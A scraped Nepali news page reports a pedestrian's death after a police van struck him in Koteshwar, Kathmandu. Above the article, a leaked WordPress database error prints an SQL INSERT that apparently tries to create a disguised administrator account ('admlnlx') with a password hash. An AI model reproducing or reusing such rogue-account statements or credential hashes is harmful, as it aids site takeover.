WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1YsrVvFg.xtYbhD1Amf.7aXcPgG87.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:29:31', '', 'admlnlx', 'admlnlx')

प्रहरीको गाडीले ठक्कर दिँदा कोटेश्वरमा पैदलयात्रीको मृत्यु – Gaule Khabar

प्रहरीको गाडीले ठक्कर दिँदा कोटेश्वरमा पैदलयात्रीको मृत्यु

प्रहरीको गाडीले ठक्कर दिँदा कोटेश्वरमा पैदलयात्रीको मृत्यु

गाउँले न्युज, २९ साउन, काठमाण्डौ । महानगरीय ट्राफिक प्रहरी महाशाखाबाट ड्युटीमा खटिएका प्रहरीको भ्यानले कोटेश्वर चोकनजिकै ठक्कर दिँदा एक पैदलयात्रीको मृत्यु भएको छ ।
महाशाखाबाट मंगलबार राति ११ बजे निस्केको बा १ झ ७८६६ नम्बरको भ्यानले ठक्कर दिएपछी उपचारको लागि ट्रमा सेन्टर लगिएको थियो । बुधवार बिहान ९ बजे घाइतेको मृत्‍यु भएको अस्पातलले जनाएको हो ।

गाडी र चालकलाई बानेश्वर वृत्तले नियन्त्रणमा लिएर अनुसन्धान थालेको परिसर प्रवक्ता डिएसपी होविन्द्र बोगटीले बताए । ती व्यक्तिबाट स्पष्ट परिचय खुल्ने कुनै पनि कागजात फेला नपरेको बोगटीले बताए ।

‘आकाशे पुलमूनि कपडा र बोरा भेटिएका छन्, ती व्यक्ति त्यहीँ बसिरहेको हुनसक्ने अनुमान छ,’ बोगटीले भने ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका